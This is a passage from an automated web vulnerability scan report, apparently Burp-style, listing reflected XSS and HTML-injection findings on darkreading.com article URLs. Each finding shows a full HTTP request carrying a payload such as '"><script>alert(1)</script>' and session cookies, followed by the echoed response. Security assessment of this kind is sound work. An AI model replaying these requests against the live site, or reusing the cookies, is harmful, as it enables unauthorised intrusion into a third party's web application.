This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlea6411"><a>81184b615aa/223100233/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df64a"><a>08e0295c605 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223100233df64a"><a>08e0295c605/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1d1"><a>09bcd80775f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100233/index.html9a1d1"><a>09bcd80775f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2be6c'><a>b925cb4d757 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100233/index.html2be6c'><a>b925cb4d757 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Criminals ...[SNIP]...
<a href='http://www.darkreading.com/security/article/223100233/index.html2be6c'><a>b925cb4d757?fmid=12388'>
...[SNIP]...
3.483. http://www.darkreading.com/security/article/223100233/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100233/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff26f"><script>alert(1)</script>05bc0868a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100233/index.html?ff26f"><script>alert(1)</script>05bc0868a97=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e655e"><a>59e03e8463 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlee655e"><a>59e03e8463/223100436/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32352"><a>878f86d0886 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/22310043632352"><a>878f86d0886/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 197bf'><a>2c10b2a16b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100436/index.html197bf'><a>2c10b2a16b1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7237d"><a>8b187b4678c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100436/index.html7237d"><a>8b187b4678c HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Attack Un ...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F223100436%2Findex.html7237d%22%3E%3Ca%3E8b187b4678c&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/223100436/index.html7237d"><a>8b187b4678c">
...[SNIP]...
3.488. http://www.darkreading.com/security/article/223100436/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100436/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933f3"><script>alert(1)</script>24e5ab25faa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100436/index.html?933f3"><script>alert(1)</script>24e5ab25faa=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d3bc"><a>65696441f0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article8d3bc"><a>65696441f0b/223100902/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b65b5"><a>e64cf2b6fbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223100902b65b5"><a>e64cf2b6fbc/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ca50"><a>b1509081941 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100902/index.html9ca50"><a>b1509081941 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ce65a'><a>7efdb634037 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100902/index.htmlce65a'><a>7efdb634037 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi ...[SNIP]...
<input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/223100902/index.htmlce65a'><a>7efdb634037'>
...[SNIP]...
3.493. http://www.darkreading.com/security/article/223100902/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100902/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7be"><script>alert(1)</script>57d0bc08a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100902/index.html?ab7be"><script>alert(1)</script>57d0bc08a4e=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e15a"><a>0d00b3f46d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7e15a"><a>0d00b3f46d5/223800139/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e81"><a>29c48682132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223800139e7e81"><a>29c48682132/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8d2f'><a>deed5c4f771 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800139/index.htmlf8d2f'><a>deed5c4f771 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7e8"><a>bd226ccaf3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800139/index.html2b7e8"><a>bd226ccaf3a HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Tech Insi ...[SNIP]...
F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F223800139%2Findex.html2b7e8%22%3E%3Ca%3Ebd226ccaf3a&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/223800139/index.html2b7e8"><a>bd226ccaf3a">
...[SNIP]...
3.498. http://www.darkreading.com/security/article/223800139/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223800139/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8963f"><script>alert(1)</script>83349dc4c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223800139/index.html?8963f"><script>alert(1)</script>83349dc4c3d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee23"><a>0324e848b10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article4ee23"><a>0324e848b10/223800256/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1415e"><a>24f0a4cec06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2238002561415e"><a>24f0a4cec06/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f7df"><a>0858b4fb196 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800256/index.html7f7df"><a>0858b4fb196 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bfb33'><a>c794812e479 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800256/index.htmlbfb33'><a>c794812e479 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Security ...[SNIP]...
<input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/223800256/index.htmlbfb33'><a>c794812e479'>
...[SNIP]...
3.503. http://www.darkreading.com/security/article/223800256/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223800256/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2901e"><script>alert(1)</script>203150ac5d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223800256/index.html?2901e"><script>alert(1)</script>203150ac5d4=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2a5"><a>e197445a0c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleab2a5"><a>e197445a0c5/224200523/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4782"><a>e09cbf33387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224200523a4782"><a>e09cbf33387/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b023f'><a>06461d62d1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224200523/index.htmlb023f'><a>06461d62d1f HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8018"><a>df1a0994835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224200523/index.htmld8018"><a>df1a0994835 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224200523%2Findex.htmld8018%22%3E%3Ca%3Edf1a0994835&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224200523/index.htmld8018"><a>df1a0994835"> ...[SNIP]...
3.508. http://www.darkreading.com/security/article/224200523/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224200523/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a1b"><script>alert(1)</script>fa040d0d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224200523/index.html?a1a1b"><script>alert(1)</script>fa040d0d2e=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94551"><a>4b58d9a3886 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
